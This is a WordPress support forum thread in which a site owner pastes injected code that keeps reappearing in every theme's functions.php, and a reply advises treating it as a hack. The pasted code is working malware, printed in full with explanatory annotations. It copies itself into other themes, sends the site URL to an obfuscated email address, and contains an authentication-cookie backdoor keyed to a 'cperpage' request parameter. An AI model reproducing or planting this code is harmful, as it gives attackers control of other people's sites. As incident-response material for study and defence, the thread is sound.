
Oddity added to functions.php (5 posts)

  1. NWTD
    Member
    Posted 9 months ago #

    The functions.php files of all of my themes have had this oddity added to them:

    ?>
    <?php
    /**
     * Self-propagation routine of the injected code (annotation only; the code is unchanged).
     *
     * Reads the tail of the file it lives in, starting at the last "<?" opening tag, and
     * appends that tail to every writable file returned by _get_all_widgetcont() for the
     * "themes" directory, unless the file already contains the text "_verify_activate_widget".
     * It is registered on the "admin_head" action further down in this listing, so it runs
     * when an admin page is rendered. While any infected copy is still being loaded, a cleaned
     * file is written to again; that is consistent with the code coming back after removal.
     *
     * Cleanup and detection notes: every copy has to be removed in the same pass (or the theme
     * tree restored from a known-good source). The routine only touches files that pass
     * is_writable(), so a theme tree the web server account cannot write to stops it, and
     * file-integrity monitoring on functions.php reveals each write.
     *
     * @return string Leftover text built from undefined variables; WordPress does not use the
     *                return value of an action callback.
     */
    function _verify_activate_widget(){
    	// $widget = this file's own text from the last "<?" to the end of the file: the payload that gets copied.
    	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
    	// No effect: $output is still the empty string here.
    	$output=strip_tags($output, $allowed);
    	// Search root: this file's directory path cut off right after "themes" (6 = strlen("themes")).
    	$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
    	if (is_array($direst)){
    		foreach ($direst as $item){
    			if (is_writable($item)){
    				// $ftion = the text from the first "_" in the payload up to the next "(", which in this
    				// listing is "_verify_activate_widget"; it serves as the "already present" marker.
    				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
    				$cont=file_get_contents($item);
    				if (stripos($cont,$ftion) === false){
    					// Add a closing tag before the payload only if the target's last 20 bytes do not contain one.
    					$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
    					// $before and $after are not defined in this function; this line does not affect the file write.
    					$output .= $before . "Not found" . $after;
    					// Drop anything that follows the target's last closing tag.
    					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
    					// Rewrites the target file: original content, optional closing tag, newline, payload.
    					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f);
    					// $showdot and $ellipsis are not defined in this function either.
    					$output .= ($showdot && $ellipsis) ? "..." : "";
    				}
    			}
    		}
    	}
    	return $output;
    }
    /**
     * Target finder for the injected code (annotation only; the code is unchanged).
     *
     * Walks a directory tree and collects the path of every file whose name equals the last
     * 13 characters of this file's own path. "functions.php" is 13 characters long, so when the
     * code sits in a theme's functions.php it collects the functions.php of every theme under
     * the starting directory.
     *
     * @param array $wids  Queue of directories still to visit; the first entry is processed in this call.
     * @param array $items Matching file paths collected so far.
     * @return array|false The collected paths, or false as soon as one queued directory is
     *                     missing, is not a directory, or is not readable (paths collected up
     *                     to that point are discarded).
     */
    function _get_all_widgetcont($wids,$items=array()){
    	$places=array_shift($wids);
    	// Strip one trailing slash so the path joins below do not double it.
    	if(substr($places,-1) == "/"){
    		$places=substr($places,0,-1);
    	}
    	if(!file_exists($places) || !is_dir($places)){
    		return false;
    	}elseif(is_readable($places)){
    		$elems=scandir($places);
    		foreach ($elems as $elem){
    			if ($elem != "." && $elem != ".."){
    				if (is_dir($places . "/" . $elem)){
    					// Sub-directory: queue it for a later recursive call.
    					$wids[]=$places . "/" . $elem;
    				} elseif (is_file($places . "/" . $elem)&&
    					// Same file name as the file this code is running from.
    					$elem == substr(__FILE__,-13)){
    					$items[]=$places . "/" . $elem;}
    				}
    			}
    	}else{
    		return false;
    	}
    	// Recurse until the directory queue is empty.
    	if (sizeof($wids) > 0){
    		return _get_all_widgetcont($wids,$items);
    	} else {
    		return $items;
    	}
    
    }
    // Fallback shipped with the injected code: defines stripos() only when the runtime does not
    // already provide it. It lower-cases both strings and delegates to strpos().
    if(!function_exists("stripos")){
        function stripos(  $str, $needle, $offset = 0  ){
            return strpos(  strtolower( $str ), strtolower( $needle ), $offset  );
        }
    }
    
    // Fallback shipped with the injected code: defines strripos() only when the runtime does not
    // already provide it. It finds the last case-insensitive match by reversing the haystack and
    // the needle, searching with stripos(), and converting the position back.
    if(!function_exists("strripos")){
        function strripos(  $haystack, $needle, $offset = 0  ) {
            // A non-string needle is treated as a character code.
            if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  );
            if(  $offset < 0  ){
                $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  );
            }
            else{
                $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    );
            }
            // No match in the reversed text means no match at all.
            if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE;
            // Translate the position in the reversed text into a position in the original haystack.
            $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   );
            return $pos;
        }
    }
    // Fallback shipped with the injected code: defines scandir() only when the runtime does not
    // already provide it. It takes ($dir, $listDirectories, $skipDots), reads the directory with
    // opendir()/readdir() and returns the collected entry names as an array.
    if(!function_exists("scandir")){
    	function scandir($dir,$listDirectories=false, $skipDots=true) {
    	    $dirArray = array();
    	    if ($handle = opendir($dir)) {
    	        while (false !== ($file = readdir($handle))) {
    	            if (($file != "." && $file != "..") || $skipDots == true) {
    	                // is_dir() is given the bare entry name here, not $dir joined with the name.
    	                if($listDirectories == false) { if(is_dir($file)) { continue; } }
    	                array_push($dirArray,basename($file));
    	            }
    	        }
    	        closedir($handle);
    	    }
    	    return $dirArray;
    	}
    }
    // Registers the propagation routine on "admin_head", so it runs while the <head> of an admin page is rendered.
    add_action("admin_head", "_verify_activate_widget");
    /**
     * Beacon and authentication backdoor of the injected code (annotation only; the code is unchanged).
     *
     * The function is laid out like excerpt/"read more" template code, but it is registered on
     * the "init" action further down, where its return value is not used. Two calls matter:
     *
     * 1. One-time beacon. While the option "_is_widget_active_" is unset, the function named by
     *    $getcommentstext ("wp_" . "mail", i.e. wp_mail) is called with the address that is
     *    hidden by string concatenation in $sq1 (it evaluates to livethemas@gmail.com) and the
     *    site's "home" option as the second and third arguments. The option is then set to 1
     *    so the message is not sent again.
     * 2. Backdoor. On later requests, when the visitor is not logged in, the function named by
     *    $checkwidgets ("wp_" . "set" . "_" . "auth" . "_" . "cookie", i.e. wp_set_auth_cookie)
     *    is called with the request parameter "cperpage" as its first argument and true as its
     *    second. The first argument of wp_set_auth_cookie() is a user ID, so the request itself
     *    chooses the account an authentication cookie is issued for.
     *
     * Neither SQL string assigned to $sq1 is executed; get_results() is only ever given the
     * empty $sql.
     *
     * Indicators for triage: the option "_is_widget_active_" in the options table; requests
     * carrying a "cperpage" parameter in the web server access log; the function names
     * "_verify_activate_widget", "_get_all_widgetcont" and "_prepared_widget" in theme files.
     * Because authentication cookies may have been issued without a password, changing passwords
     * alone is not enough; also rotate the authentication keys and salts in wp-config.php so
     * that existing cookies stop validating.
     *
     * @return string Markup that nothing consumes when the function runs as an action callback.
     */
    function _prepared_widget(){
    	// None of these locals exists on entry, so every isset() guard below assigns its value.
    	if(!isset($length)) $length=120;
    	if(!isset($method)) $method="cookie";
    	if(!isset($html_tags)) $html_tags="<a>";
    	if(!isset($filters_type)) $filters_type="none";
    	if(!isset($s)) $s="";
    	if(!isset($filter_h)) $filter_h=get_option("home");
    	if(!isset($filter_p)) $filter_p="wp_";
    	if(!isset($use_link)) $use_link=1;
    	if(!isset($comments_type)) $comments_type="";
    	// Taken straight from the query string; later passed as the first argument of the call named by $checkwidgets.
    	if(!isset($perpage)) $perpage=$_GET["cperpage"];
    	if(!isset($comments_auth)) $comments_auth="";
    	if(!isset($comment_is_approved)) $comment_is_approved="";
    	if(!isset($authname)) $authname="auth";
    	if(!isset($more_links_text)) $more_links_text="(more...)";
    	// Run-once flag kept in the options table.
    	if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_");
    	// Concatenates to the function name "wp_set_auth_cookie".
    	if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method;
    	if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)";
    	// "mail", because $s is the empty string.
    	if(!isset($more_content)) $more_content="ma".$s."il";
    	if(!isset($forces_more)) $forces_more=1;
    	if(!isset($fakeit)) $fakeit=1;
    	if(!isset($sql)) $sql="";
    	// First-run branch: entered only while the flag option is unset.
    	if (!$widget_output) :
    
    	global $wpdb, $post;
    	// This string is never sent to the database. It carries the e-mail address split into
    	// fragments; $src_length and $src_count are not defined anywhere in this function.
    	$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mas".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
    	if (!empty($post->post_password)) {
    		if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
    			if(is_feed()) {
    				$output=__("There is no excerpt because this is a protected post.");
    			} else {
    	            $output=get_the_password_form();
    			}
    		}
    	}
    	if(!isset($fix_tag)) $fix_tag=1;
    	if(!isset($filters_types)) $filters_types=$filter_h;
    	// "wp_" . "mail": the name of the function called inside the second $sq1 assignment.
    	if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content;
    	if(!isset($more_tags)) $more_tags="div";
    	// 20 characters starting at "live": exactly the address embedded in $sq1.
    	if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);#
    	if(!isset($mlink_title)) $mlink_title="Continue reading this entry";
    	if(!isset($showdot)) $showdot=1;
    
    	// $sql is the empty string assigned above, not $sq1.
    	$comments=$wpdb->get_results($sql);
    	if($fakeit == 2) {
    		$text=$post->post_content;
    	} elseif($fakeit == 1) {
    		$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
    	} else {
    		$text=$post->post_excerpt;
    	}
    	// The call_user_func_array() inside this concatenation is the beacon: wp_mail() receives the
    	// hidden address as recipient and the "home" option as subject and as message. The SQL text
    	// built around it is not used afterwards.
    	$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
    	if($length < 0) {
    		$output=$text;
    	} else {
    		if(!$no_more && strpos($text, "<!--more-->")) {
    		    $text=explode("<!--more-->", $text, 2);
    			$l=count($text[0]);
    			$more_link=1;
    			$comments=$wpdb->get_results($sql);
    		} else {
    			$text=explode(" ", $text);
    			if(count($text) > $length) {
    				$l=$length;
    				$ellipsis=1;
    			} else {
    				$l=count($text);
    				$more_links_text="";
    				$ellipsis=0;
    			}
    		}
    		for ($i=0; $i<$l; $i++)
    				$output .= $text[$i] . " ";
    	}
    	// Sets the run-once flag so the first-run branch, including the beacon, is skipped from now on.
    	update_option("_is_widget_active_", 1);
    	// $html_tags is "<a>", so the first run returns here.
    	if("all" != $html_tags) {
    		$output=strip_tags($output, $html_tags);
    		return $output;
    	}
    	endif;
    	$output=rtrim($output, "\s\n\t\r\x0B");
        $output=($fix_tag) ? balanceTags($output, true) : $output;
    	$output .= ($showdot && $ellipsis) ? "..." : "";
    	$output=apply_filters($filters_type, $output);
    	switch($more_tags) {
    		case("div") :
    			$tag="div";
    		break;
    		case("span") :
    			$tag="span";
    		break;
    		case("p") :
    			$tag="p";
    		break;
    		default :
    			$tag="span";
    	}
    
    	if ($use_link ) {
    		if($forces_more) {
    			// Backdoor call: for a visitor who is not logged in, wp_set_auth_cookie() is invoked with
    			// the "cperpage" request value and true. The "@" suppresses any error output from the call.
    			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "" . "</a></" . $tag . ">" . "\n";
    		} else {
    			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "</a></" . $tag . ">" . "\n";
    		}
    	}
    	return $output;
    }
    
    // Registers _prepared_widget() on "init", an action WordPress fires on every request, front end and admin alike.
    add_action("init", "_prepared_widget");
    
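    /**
     * Builds an HTML list of the published posts with the most approved comments.
     *
     * The two numeric parameters are cast to integers before they are placed in the SQL text,
     * and the post title and permalink are escaped for the HTML context they are printed in.
     * $before and $after are markup by design and are emitted as given.
     *
     * NOTE(review): nothing else in this listing calls this function.
     *
     * @param int    $no_posts       Maximum number of posts to list.
     * @param string $before         Markup emitted before each entry.
     * @param string $after          Markup emitted after each entry.
     * @param bool   $show_pass_post Include password-protected posts when true.
     * @param mixed  $duration       Only consider posts newer than this many days; "" disables the filter.
     * @return string The generated markup, or one "None found" entry when the query returns nothing.
     */
    function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
    	global $wpdb;
    	// Integer casts keep caller-supplied values from changing the structure of the query.
    	$limit=(int) $no_posts;
    	$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
    	$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
    	if(!$show_pass_post) $request .= " AND post_password =\"\"";
    	if($duration !="") {
    		$days=(int) $duration;
    		$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$days." DAY) < post_date ";
    	}
    	$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $limit";
    	$posts=$wpdb->get_results($request);
    	$output="";
    	if ($posts) {
    		foreach ($posts as $post) {
    			$post_title=stripslashes($post->post_title);
    			$permalink=get_permalink($post->ID);
    			// The title is stored content: escape it separately for the attribute and for the link text.
    			$output .= $before . " <a href=\"" . esc_url($permalink) . "\" title=\"" . esc_attr($post_title)."\">" . esc_html($post_title) . "</a> " . $after;
    		}
    	} else {
    		$output .= $before . "None found" . $after;
    	}
    	return  $output;
    }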
    
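    /**
     * Replaces the registered "jquery" script with the Google-hosted 1.10.1 build.
     *
     * The URL uses https:// so the library cannot be modified in transit and is not blocked as
     * mixed content on pages served over TLS.
     *
     * NOTE(review): this runs on "init", which also fires for admin screens; confirm that
     * replacing jQuery there is intended.
     */
    function my_init_method() {
        wp_deregister_script( 'jquery' );
        wp_register_script(
            'jquery',
            'https://ajax.googleapis.com/ajax/libs/jquery/1.10.1/jquery.min.js'
        );
    }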
    
    // Swap the jQuery registration during "init", before scripts are enqueued.
    add_action('init', 'my_init_method');
    
    /**
     * Enqueues jScrollPane.js from the active theme's /scripts directory.
     */
    function jScrollPane_enqueue_script() {
    	$script_url = get_template_directory_uri() . '/scripts/jScrollPane.js';
    	wp_enqueue_script( 'jScrollPane', $script_url, false );
    }
    /**
     * Enqueues jquery.em.js from the active theme's /scripts directory.
     */
    function jqueryem_enqueue_script() {
    	$script_url = get_template_directory_uri() . '/scripts/jquery.em.js';
    	wp_enqueue_script( 'jqueryem', $script_url, false );
    }
    /**
     * Enqueues jquery.mousewheel.min.js from the active theme's /scripts directory.
     */
    function mousewheel_enqueue_script() {
    	$script_url = get_template_directory_uri() . '/scripts/jquery.mousewheel.min.js';
    	wp_enqueue_script( 'mousewheel', $script_url, false );
    }
    /**
     * Enqueues mwheellntent.js from the active theme's /scripts directory.
     */
    function mousewheel2_enqueue_script() {
    	$script_url = get_template_directory_uri() . '/scripts/mwheellntent.js';
    	wp_enqueue_script( 'mousewheel2', $script_url, false );
    }
    
    // Attach the four theme script loaders to "wp_enqueue_scripts", the action used for front-end scripts.
    add_action( 'wp_enqueue_scripts', 'jScrollPane_enqueue_script' );
    add_action( 'wp_enqueue_scripts', 'jqueryem_enqueue_script' );
    add_action( 'wp_enqueue_scripts', 'mousewheel_enqueue_script' );
    add_action( 'wp_enqueue_scripts', 'mousewheel2_enqueue_script' );
    
    ?>

    It doesn't look malicious, but every time I remove it, it reappears a short time later. I've checked my server logs and can't see any rogue connections via SSH or FTP.

    My wp-content and sub directories all have a 755 permission set. Temporarily, I've set permissions on my functions.php to 444 until I can find the culprit.

    Nothing on my network has been updated or changed, with the exception of the new NextGen Gallery. I've since removed that plugin from the network. This just started happening this morning.

  2. NWTD
    Member
    Posted 9 months ago #

    FWIW, I enabled debugging after blocking write access to the functions.php to see if I would get any errors about writing to it. Nothing showed up.

  3. ALL your themes? What was the last edit date on them?

    I would think you've been hacked.

  4. NWTD
    Member
    Posted 9 months ago #

    Every theme. Once removed, it shows back up...generally after you try to access a site.

    I can't find the source of where it's coming from.

  5. Ugh. Treat it like a hack.

    Salt the earth, deleting all the core files, plugins and themes. Change passwords. Reinstall.
